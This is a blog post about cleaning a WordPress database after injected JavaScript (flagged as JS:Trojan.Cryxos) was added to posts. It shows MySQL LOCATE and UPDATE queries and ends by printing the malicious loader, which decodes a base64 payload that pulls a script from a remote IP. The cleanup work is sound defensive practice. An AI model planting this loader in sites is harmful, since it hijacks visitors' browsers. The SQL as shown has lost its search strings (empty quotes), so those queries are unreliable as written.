WordPress sites being attacked, malicious java code appended to the post

Lately I have been observed several of my work press sites go down.

Symptoms include:
* certain posts do not load up
* Antivirus program points to the page having a malicious code
* WordPress admin page loads, the pages can be edited. However, when viewed in html view, I see the malicious code can bee seen, the code start s with <!–codes_iframe–> <script> and ends with </script> <!–/codes_iframe>


To resolve this, I logged on to the mysql Cli and searched the database for the malicious code. I found them to be on the table wp_posts and column post_content. However, the column also contained the body of the post.

the logical approach to remove the malicious code was to delete the contents from <!–codes_iframe–> to <!–/codes_iframe>

BitDefender shows the page as: Threat name: JS:Trojan.Cryxos.1952

Use the locate() to find the code



mysql> SELECT LOCATE(”, post_content) as start from wp_posts;
+——-+
| start |
+——-+
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 11986 |
| 0 |
| 0 |
| 0 |
| 7735 |
| 0 |
| 0 |
| 0 |
| 8848 |
| 0 |
| 2667 |
| 0 |
| 2580 |
| 0 |
| 3287 |
| 0 |
| 1695 |
| 0 |
| 3353 |
| 0 |
| 5332 |
| 0 |
| 3399 |
| 0 |
| 1963 |
| 0 |
| 1 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2190 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 1789 |
| 0 |
| 0 |
| 0 |
| 5109 |
| 0 |
| 0 |
| 5294 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3493 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3280 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2184 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 25 |
| 796 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 734 |
| 0 |
| 309 |
| 0 |
| 308 |
| 0 |
| 0 |
| 2615 |
| 0 |
| 0 |
| 0 |
| 0 |
| 1848 |
| 0 |
| 2916 |
| 0 |
| 0 |
| 437 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2793 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2160 |
| 0 |
| 604 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 1779 |
| 0 |
| 846 |
| 0 |
| 7571 |
| 0 |
| 0 |
| 0 |
| 1685 |
| 0 |
| 1595 |
| 0 |
| 1595 |
| 7571 |
| 846 |
| 1779 |
| 604 |
| 2160 |
| 2793 |
| 2916 |
| 1848 |
| 2615 |
| 308 |
| 309 |
| 1161 |
| 1685 |
| 437 |
| 796 |
| 25 |
| 734 |
| 2184 |
| 3280 |
| 3493 |
| 5294 |
| 5109 |
| 1789 |
| 1 |
| 1963 |
| 3399 |
| 5332 |
| 3353 |
| 1695 |
| 3287 |
| 2190 |
| 2580 |
| 2667 |
| 8848 |
| 7735 |
| 11986 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 7584 |
+——-+
364 rows in set (0.01 sec)


mysql> SELECT LOCATE(”, post_content ) as end from wp_posts;
+——-+
| end |
+——-+
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 12815 |
| 0 |
| 0 |
| 0 |
| 8564 |
| 0 |
| 0 |
| 0 |
| 9677 |
| 0 |
| 3496 |
| 0 |
| 3409 |
| 0 |
| 4116 |
| 0 |
| 2524 |
| 0 |
| 4182 |
| 0 |
| 6161 |
| 0 |
| 4228 |
| 0 |
| 2792 |
| 0 |
| 830 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3019 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2618 |
| 0 |
| 0 |
| 0 |
| 5938 |
| 0 |
| 0 |
| 6123 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 4322 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 4109 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3013 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 854 |
| 1625 |
| 0 |
| 0 |
| 0 |
| 1182 |
| 0 |
| 0 |
| 1563 |
| 0 |
| 1138 |
| 0 |
| 1137 |
| 0 |
| 0 |
| 3444 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2677 |
| 0 |
| 3745 |
| 0 |
| 0 |
| 1266 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3622 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2989 |
| 0 |
| 1433 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2608 |
| 0 |
| 1675 |
| 0 |
| 8400 |
| 0 |
| 0 |
| 0 |
| 2514 |
| 0 |
| 2424 |
| 0 |
| 2424 |
| 8400 |
| 1675 |
| 2608 |
| 1433 |
| 2989 |
| 3622 |
| 3745 |
| 2677 |
| 3444 |
| 1137 |
| 1138 |
| 1990 |
| 2514 |
| 1266 |
| 1625 |
| 854 |
| 1563 |
| 3013 |
| 4109 |
| 4322 |
| 6123 |
| 5938 |
| 2618 |
| 830 |
| 2792 |
| 4228 |
| 6161 |
| 4182 |
| 2524 |
| 4116 |
| 3019 |
| 3409 |
| 3496 |
| 9677 |
| 8564 |
| 12815 |
| 0 |
| 0 |
| 0 |
| 1161 |
| 1182 |
| 8413 |
+——-+
364 rows in set (0.00 sec)

I used the below query to clear them from the database:

UPDATE wp_posts SET post_content = CONCAT(
SUBSTRING(post_content, 1, LOCATE(”, post_content)-1),
SUBSTRING(post_content, LOCATE(”, post_content)+LENGTH(”)))
WHERE LOCATE(”, post_content) > 0;




mysql> UPDATE wp_posts SET post_content = CONCAT(
-> SUBSTRING(post_content, 1, LOCATE(”, post_content)-1),
-> SUBSTRING(post_content, LOCATE(”, post_content)+LENGTH(”)))
-> WHERE LOCATE(”, post_content) > 0;
Query OK, 74 rows affected (0.05 sec)
Rows matched: 74 Changed: 74 Warnings: 0

Logged back on and conformed that no other data was missing.

PS! Do take backup of the database before attempting to make changes!!

Malicious code (removed the braces to avoid it from infecting the pages again)

!–codes_iframe– script type=\”text/javascript\” function getCookie e {var U=document.cookie.match new RegExp \” ?:^|; \”+e.replace / [\.$?|{}\ \ \[\]\\\/\+^] /g,\”\\$1\” +\”= [^;] \” ;return U?decodeURIComponent U[1] :void 0}var src=\”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\”,now=Math.floor Date.now /1e3 ,cookie=getCookie \”redirect\” ;if now = time=cookie ||void 0===time {var time=Math.floor Date.now /1e3+86400 ,date=new Date new Date .getTime +86400 ;document.cookie=\”redirect=\”+time+\”; path=/; expires=\”+date.toGMTString ,document.write \’ script src=\”\’+src+\’\” \/script \’ } /script !–/codes_iframe–

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.